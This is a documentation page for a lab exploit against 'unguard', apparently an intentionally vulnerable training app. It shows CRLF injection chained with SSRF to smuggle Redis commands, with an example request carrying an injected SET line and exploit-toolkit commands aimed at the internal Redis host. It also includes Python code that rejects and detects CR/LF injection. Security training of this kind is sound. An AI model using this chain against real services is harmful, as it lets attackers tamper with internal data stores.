A user can inject CRLF sequences into the server-sent HTTP request and thereby set arbitrary HTTP headers, which enables request smuggling that executes arbitrary Redis commands.
The version of Apache HttpClient in use contains a vulnerability that lets an attacker who controls the value of an HTTP header inject CRLF sequences. The attacker therefore controls part of the request and can append arbitrary text (e.g. additional HTTP headers). Combined with the SSRF vulnerability, this makes it possible to smuggle RESP data inside the HTTP request and thereby send commands to the internal Redis instance.
When abusing this, an HTTP request can look something like this:

```http
GET /something
X-Expected-Header: value   # injecting a newline in the user-controllable path here to control the line below
SET key value              # any Redis commands here
 HTTP/1.1
Host: 127.0.0.1:6379
User-Agent: curl/7.52.1
Accept: */*
Content-Type: text/plain
...
```
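As an added example (not part of unguard or its exploit toolkit), the following shows the validation a service should apply before placing user-controlled data into an outgoing request, and a check that flags raw or percent-encoded CR/LF in access-log request targets; the log lines, names and decode limit are constructed assumptions.

```python
"""Reject and detect CR/LF in user-controlled values before they reach an
HTTP client or a header.  Added example for this page; not unguard code."""
import re
from urllib.parse import unquote

# Catch raw CR/LF and percent-encoded forms after up to MAX_DECODES rounds
# of decoding, so double encoding such as %250d%250a is caught as well.
MAX_DECODES = 3
CRLF_RE = re.compile(r"[\r\n]")

def canonicalize(value: str) -> str:
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(MAX_DECODES):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_crlf(value: str) -> bool:
    """True when the value contains a raw or encoded CR or LF."""
    return CRLF_RE.search(canonicalize(value)) is not None

def safe_header_value(value: str) -> str:
    """Return the value unchanged, or raise before it can become a header."""
    if has_crlf(value):
        raise ValueError("CR/LF in header value rejected")
    return value

# Constructed sample access-log lines (not real traffic): one benign proxy
# request and one whose target carries an encoded CRLF and an injected line.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /proxy?url=http://example.internal/ok HTTP/1.1" 200',
    '10.0.0.9 - - "GET /proxy?url=http://unguard-redis:6379/%0d%0aSET%20key%20value HTTP/1.1" 200',
]
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def flag_crlf_requests(lines):
    """Return the request targets in the log that carry raw or encoded CR/LF."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and has_crlf(m.group(1)):
            hits.append(m.group(1))
    return hits
```

Rejecting at the boundary is the fix for the application; the log check is what a detection rule would run over proxy or ingress access logs to spot attempts against the unpatched service.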
For this exploit to work you need:
- unguard deployed and running
- unguard-exploit-toolkit set up
Make sure to log in first:

```shell
$ ug-exploit login <USERNAME>
```
Next, send your payload. Make sure to specify the Redis instance that is reachable from the frontend. Within Docker or K8s, this should be `unguard-redis:6379`.

```shell
$ ug-exploit redis --redis-host unguard-redis:6379 ./exploits/crlf-injection/payload/hackedflag.txt
```
You can use any Redis client to verify that the exploit has worked. For convenience, you can open a shell in the Redis pod and use the Redis CLI:

```shell
$ kubectl exec -i -t -n unguard unguard-redis-6668588958-tm8l9 -c redis -- bash # specify your pod name
$ redis-cli
127.0.0.1:6379> GET hacked
exploitworked
```